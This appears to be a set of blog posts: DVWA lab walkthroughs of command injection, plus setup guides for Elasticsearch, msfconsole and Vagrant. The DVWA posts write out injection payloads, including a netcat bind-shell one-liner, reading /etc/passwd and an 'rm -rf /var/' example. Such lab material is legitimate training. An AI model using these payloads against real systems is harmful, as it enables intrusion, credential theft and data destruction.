Thursday, 26 March 2020

Damn Vulnerable Web App (DVWA) | Command Injection Attack using NetCat

In this post we are going to cover Command Injection Attack using NetCat on Damn Vulnerable Web App.

Background:
  • What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
  • What is Command Execution?
    • Command Execution is where a website application provides the ability to execute system commands.
  • What is a Command Injection Attack?
    • The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application.
    • In situations like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it
      as an authorized system user.
    • Note, the commands are executed with the same privileges as the application and/or web server.
    • Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).
  • What is a Command Injection Listener Attack?
    • A Command Injection Listener Attack is where a malicious user creates a backdoor listener using common network utilities such as netcat.
    • Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP.
      • Unix/Linux Example: 9.9.9.9;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Lab:
1) Access DVWA application on your browser.

2) Click on Command Injection

3) Pass below data as argument in text box and lick on submit. 
192.168.43.118;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
  • Make a FIFO named pipe.
  • Pipes allow separate processes to communicate without having been designed explicitly to work together.
  • This will allow two processes to connect to netcat.
  • nc -l 4444, tells netcat to listen and allow connections on port 4444.
  • 192.168.43.118 is IP address of DVWA applciation.
4) Point 3 will open a back door to access DVWA machine. 

5) Now Login to your Kali Linux machine.

6) Now Use NetCat on Kali Linux to access DVWA instance.
  1. nc 192.168.43.209 4444
    • Use Kali Linux to Connect to DVWA Netcat session on port 4444
  2. hostname
    • This is server hostname that hosts DVWA.
  3. cat /etc/passwd
    • Show content of the /etc/passwd file


Like this we can perform any operation on DVWA instance from Kali Linux as long as we have NetCat session running on DVWA machine. 



Saturday, 21 March 2020

Damn Vulnerable Web App (DVWA) | Command Injection Attack

In this post we are going to discuss about Command Injection Attack. For this we are going to use Damn Vulnerable Web App (DVWA) VM.

Background:
  • What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
  • What is Command Execution?
    • Command Execution is where a website application provides the ability to execute system commands.
  • What is a Command Injection Attack?
    • The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application.
    • In situations like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it
      as an authorized system user.
    • Note, the commands are executed with the same privileges as the application and/or web server.
    • Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).
  • What is Command Injection Harvesting?
    • Command Injection Harvesting is where a malicious user manipulates a website command execution application to render sensitive data.  (E.g., usernames, config files, directory and file listings, etc).
      • Unix/Linux Example: 9.9.9.9; cat /etc/passwd
      • Windows Example: 9.9.9.9 && dir
Lab:
1) Access DVWA application on your browser.
2) Go to DVWA Security and choose Low and click on Submit.
3) Then Go to Command Injection
In this web application we have this feature to ping any IP address. Let's test this feature.
Yes. this is expected feature. Let's test if there is any security vulnerability in this feature.
4)  Now let's try to access /etc/passwd file content from this feature.

We can see the content of the file /etc/passwd on UI of our application. Similarly Attacker can run any operation on Victim machine by this Command Injection. i.e If we pass argument like 127.0.0.1 & rm -rf /var/ It will delete all content in /var folder and makes our application unusable. 


Tuesday, 3 March 2020

How to Setup Elasticsearch on Ubuntu 18.04 & 16.04 LTS

Elasticsearch is a flexible and powerful open-source, distributed real-time search and analytics engine. Using a simple set of APIs, it provides the ability for full-text search. Elastic search is freely available under the Apache 2 license, which provides the most flexibility.
This tutorial will help you to install Elasticsearch on Ubuntu 18.04 & 16.04 LTS system.

Step 1 – Prerequsities

Login to your Ubuntu system using sudo privileges. For the remote Ubuntu server using ssh to access it. Windows users can use putty or alternatives to log in to Ubuntu system.
Elasticsearch required Java to run on any system. Make sure your system has Java installed by running following command. This command will show you the current Java version.
java -version

java version "11.0.2" 2019-01-15 LTS
Java(TM) SE Runtime Environment 18.9 (build 11.0.2+9-LTS)
Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.2+9-LTS, mixed mode)
Also, make sure your JAVA_HOME environment variable is configured:
echo $JAVA_HOME

/usr/lib/jvm/java-11-oracle

Step 2 – Install Elasticsearch on Ubuntu

The Elasticsearch official team provides an apt repository to install Elasticsearch on Ubuntu Linux system. After install below package and import GPG key for Elasticsearch packages.
sudo apt-get install apt-transport-https
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
Then configure the apt repository on your Debian system. The below command will add a repository to install latest Elasticsearch 6.X on your Ubuntu system.
add-apt-repository "deb https://artifacts.elastic.co/packages/7.x/apt stable main"
After adding the repository to your system. Run the following commands to update cache and then install Elasticsearch packages on your system.
sudo apt-get update
sudo apt-get install elasticsearch

Step 3 – Configure Elasticsearch

The Elasticsearch has been installed on your system. You can customize this by editing the Elasticsearch configuration file. Edit configuration file in your favorite text editor and update it:
sudo nano /etc/elasticsearch/elasticsearch.yml
Change the following values:
/etc/elasticsearch/elasticsearch.yml
 network.host: 0.0.0.0
 cluster.name: myCluster1
 node.name: "myNode1"
  • network.host – Set the network host to 0.0.0.0 to listen on all interfaces and make it publically available. You can use your LAN address for LAN access only.
  • cluster.name – Name of the cluster. For the multi-node cluster, all the nodes must use the same cluster name.
  • node.name – Set the unique name of the node to identify in a cluster.

Step 4 – Launch Elasticsearch

To configure Elasticsearch to start automatically when the system boots up, run the following commands:
sudo /bin/systemctl enable elasticsearch.service
Elasticsearch can be started and stopped as follows:
sudo systemctl start elasticsearch.service
sudo systemctl stop elasticsearch.service

Step 5 – Test Setup

The Elasticsearch service is ready to use. You can test it using curl command-line utility. Run the simple GET command using curl to verify the setup. You will see the Elasticsearch cluster details with the version on your screen.
curl -X GET "http://localhost:9200/?pretty"
Console Output
{
  "name" : "myNode1",
  "cluster_name" : "myCluster1",
  "cluster_uuid" : "YLBEZHdqQ2W_gMiDUJXJyw",
  "version" : {
    "number" : "7.3.0",
    "build_flavor" : "default",
    "build_type" : "deb",
    "build_hash" : "de777fa",
    "build_date" : "2019-07-24T18:30:11.767338Z",
    "build_snapshot" : false,
    "lucene_version" : "8.1.0",
    "minimum_wire_compatibility_version" : "6.8.0",
    "minimum_index_compatibility_version" : "6.0.0-beta1"
  },
  "tagline" : "You Know, for Search"
}



Monday, 2 March 2020

How to Start the Metasploit Framework Console (msfconsole) | Kali Linux | Pen Testing

In this tutorial we will cover on how to use Kali Linux to exploit Metasplitable3 VM.
We assume you have already Kali Linux and Metasploitable 3 on your Machine.

1) Start PostgreSQL DB on Kali Linux
service postgresql start

2) Check PostgreSQL service status
service postgresql status


3) Configure PostgreSQL for Metasploit

4) Start msfconsole
5) Check DB connection

6) You can search any module by running commands like below.
search module_name







[SOLUTION] Vagrant box authentication failure after packaging box

 Bringing machine 'default' up with 'virtualbox' provider...  
   ==> default: Clearing any previously set forwarded ports...  
   ==> default: Clearing any previously set network interfaces...  
   ==> default: Preparing network interfaces based on configuration...  
     default: Adapter 1: nat  
     default: Adapter 2: hostonly  
   ==> default: Forwarding ports...  
     default: 22 => 2222 (adapter 1)  
   ==> default: Running 'pre-boot' VM customizations...  
   ==> default: Booting VM...  
   ==> default: Waiting for machine to boot. This may take a few minutes...  
     default: SSH address: 127.0.0.1:2222  
     default: SSH username: vagrant  
     default: SSH auth method: private key  
     default: Warning: Connection timeout. Retrying...  
     default: Warning: Authentication failure. Retrying...  
     default: Warning: Authentication failure. Retrying...  
     default: Warning: Authentication failure. Retrying...  
     default: Warning: Authentication failure. Retrying...  
     default: Warning: Authentication failure. Retrying...  
     default: Warning: Authentication failure. Retrying...  
     default: Warning: Authentication failure. Retrying...  

SOLUTION

1. Press CTRL + Z to break the 'default: Warning: Authentication failure. Retrying... or wait for few more minutes

2. Login into your guest machine - vagrant ssh , which should prompt you for password, vagrant , the default password for vagrant

3. Then go to - /home/vagrant/.ssh  and remote all the contents inside it, if the path not existed create the directory - mkdir -p /home/vagrant/.ssh

4. Then run following commands

 wget --no-check-certificate https://raw.github.com/mitchellh/vagrant/master/keys/vagrant.pub -O /home/vagrant/.ssh/authorized_keys  
 chmod 0700 /home/vagrant/.ssh  
 chmod 0600 /home/vagrant/.ssh/authorized_keys  
 chown -R vagrant /home/vagrant/.ssh  

5. Exit from the gust machine and restart it ( vagrant reload)

6. Voila! Problem solved. You should be good to go.

SUPPRESS THE  ERRORS BY ADDING FOLLOWING LINES IN VAGRANT FILE

   
 Vagrant.configure("2") do |config|  
      config.vm.box = "package.box"  
      config.vm.network "private_network", ip: "192.168.33.10"  
      config.vm.hostname = "development.vm"  
      config.vm.network "forwarded_port", guest: 80, host: 8080  
      config.vm.network "forwarded_port", guest: 3000, host: 3000  
     
      config.vm.synced_folder ".", "/var/folder_name", :mount_options => ["dmode=777", "fmode=666"]  
             
      config.ssh.username = "vagrant"  
      config.ssh.password = "vagrant"  
        
      config.ssh.insert_key = false  
             
      config.vm.provider "virtualbox" do |v|  
      v.memory = 4024  
      v.cpus = 1  
   end  
 end